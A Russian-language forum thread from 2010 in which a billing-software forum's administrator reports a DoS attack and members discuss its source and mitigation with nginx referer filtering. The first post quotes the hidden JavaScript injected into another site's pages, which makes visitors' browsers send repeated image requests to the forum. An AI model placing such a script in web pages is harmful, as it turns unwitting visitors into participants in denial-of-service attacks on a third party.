Биллинговая система Nodeny
23 Ноября 2024, 17:03:48 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
Новости: Прекращена поддержка версии Nodeny 49
 
   Начало   Помощь Поиск Войти Регистрация  
Страниц: [1]
  Печать  
Автор Тема: Ддос атака с сайта www.file4all.ru на форум  (Прочитано 9972 раз)
versus
Администратор
Спец
*****

Карма: 21
Offline Offline

Сообщений: 845


44306843
Просмотр профиля WWW Email
« : 28 Сентября 2010, 17:02:25 »

Добрый день!

На данный момент происходит дос атака с сайта www.file4all.ru на наш сервер, путем внедрения в код сайта невидимого скрипта
Код:
<div id="attack" style="display:none"><script type="text/javascript">
for(i=1; i<=50; i++) { document.write('<img
src="http://forum.nodeny.com.ua:80/index.php?' +  Math.random() +
'">'); } </script></div>
с  
http://www.file4all.ru/7145-eroru-1110-photoset.html и других страниц.

Владелец ресурса на контакт невыходит, чем обусловлена атака мне не известно.

До выяснения причин и остановки атаки форум может работать  с перебоями.
Записан
ankos
NoDeny
Пользователь
*

Карма: 2
Offline Offline

Сообщений: 45


Просмотр профиля Email
« Ответ #1 : 28 Сентября 2010, 17:08:49 »

Вообщето уже ощущалось! Злой
Записан
Maks
NoDeny
Ветеран
*

Карма: 13
Offline Offline

Сообщений: 575


Скажи спасибо - подними карму.

https://t.me/smv https://t.me/smv_wz
Просмотр профиля Email
« Ответ #2 : 28 Сентября 2010, 18:43:12 »

А у мя норм работает.
Записан

Nodeny общение
https://t.me/nodeny_chat
VitalVas
NoDeny
Спец
*

Карма: 60
Offline Offline

Сообщений: 991



Просмотр профиля WWW
« Ответ #3 : 28 Сентября 2010, 20:59:10 »

пользователь блокирован, код удален
Записан
Aivanzipper
NoDeny
Старожил
*

Карма: 62
Offline Offline

Сообщений: 387


206967443
Просмотр профиля
« Ответ #4 : 29 Сентября 2010, 08:07:59 »

VitalVas, у тебя в подписи метода есть Улыбающийся
Записан
stix
NoDeny
Спец
*

Карма: 72
Offline Offline

Сообщений: 1872


Nodeny Support Team

205539
Просмотр профиля
« Ответ #5 : 29 Сентября 2010, 08:27:16 »

месть?
Записан
versus
Администратор
Спец
*****

Карма: 21
Offline Offline

Сообщений: 845


44306843
Просмотр профиля WWW Email
« Ответ #6 : 29 Сентября 2010, 10:00:31 »

Атака прекратилась, спасибо VitalVas.

Месть или нет, мне об этом не известно. Никаких угроз или предупреждений не было, на связь владелец не выходил, поэтому не знаю чем мы его обидели.

Записан
VitalVas
NoDeny
Спец
*

Карма: 60
Offline Offline

Сообщений: 991



Просмотр профиля WWW
« Ответ #7 : 29 Сентября 2010, 11:09:30 »

это скорее всего личная месть...
Записан
versus
Администратор
Спец
*****

Карма: 21
Offline Offline

Сообщений: 845


44306843
Просмотр профиля WWW Email
« Ответ #8 : 29 Сентября 2010, 11:54:57 »

Кстати благодаря этому инцененту дошли руки потестить нжинкс на отсеивание запросов по рефереру и количеству коннектов  с одного апи. Весьма мощная штукенция с регеспами и редиректами. Понравилось. Полностью аьтаку это не остановит, канала все равно занят, но отдавать пустую страницу по рефереру быстрее чем напрягать апач и мускул.
Так что нет худа без добра ))
Записан
ser970
NoDeny
Спец
*

Карма: 70
Offline Offline

Сообщений: 1323

262462619
Просмотр профиля Email
« Ответ #9 : 29 Сентября 2010, 12:09:38 »

пользователь блокирован, код удален
VitalVas пользователь в реанимации или сразу в морг повезли?
Записан
Aivanzipper
NoDeny
Старожил
*

Карма: 62
Offline Offline

Сообщений: 387


206967443
Просмотр профиля
« Ответ #10 : 29 Сентября 2010, 12:13:05 »

Кстати благодаря этому инцененту дошли руки потестить нжинкс

Apache/2.2.9 (Debian) Phusion_Passenger/2.2.9 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_wsgi/2.5 Server at forum.nodeny.com.ua Port 80

Где-же тут nginx? Или только в планах перевести на него?
Записан
VitalVas
NoDeny
Спец
*

Карма: 60
Offline Offline

Сообщений: 991



Просмотр профиля WWW
« Ответ #11 : 29 Сентября 2010, 12:24:05 »


Apache/2.2.9 (Debian) Phusion_Passenger/2.2.9 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_wsgi/2.5 Server at forum.nodeny.com.ua Port 80

Где-же тут nginx? Или только в планах перевести на него?
C:\Documents and Settings\Admin> telnet forum.nodeny.com.ua 80
 <html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>
C:\Documents and Settings\Admin>

VitalVas пользователь в реанимации или сразу в морг повезли?
та ну,я не такой....
Записан
stix
NoDeny
Спец
*

Карма: 72
Offline Offline

Сообщений: 1872


Nodeny Support Team

205539
Просмотр профиля
« Ответ #12 : 29 Сентября 2010, 12:31:26 »

nginx в качестве прокси.
нагрузка в разы снижается
Записан
Andrey Zentavr
NoDeny
Старожил
*

Карма: 29
Offline Offline

Сообщений: 301



Просмотр профиля
« Ответ #13 : 30 Сентября 2010, 22:12:45 »

Кстати благодаря этому инцененту дошли руки потестить нжинкс на отсеивание запросов по рефереру и количеству коннектов  с одного апи. Весьма мощная штукенция с регеспами и редиректами. Понравилось. Полностью аьтаку это не остановит, канала все равно занят, но отдавать пустую страницу по рефереру быстрее чем напрягать апач и мускул.
Так что нет худа без добра ))
Поделитесь регекспами? Улыбающийся
Записан
versus
Администратор
Спец
*****

Карма: 21
Offline Offline

Сообщений: 845


44306843
Просмотр профиля WWW Email
« Ответ #14 : 01 Октября 2010, 16:46:24 »

Регеспы лучше сесть и выучить, очень мощная штука для работы. Нужнане только прогерам но и админам :-)
Записан
Страниц: [1]
  Печать  
 
Перейти в:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.20 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!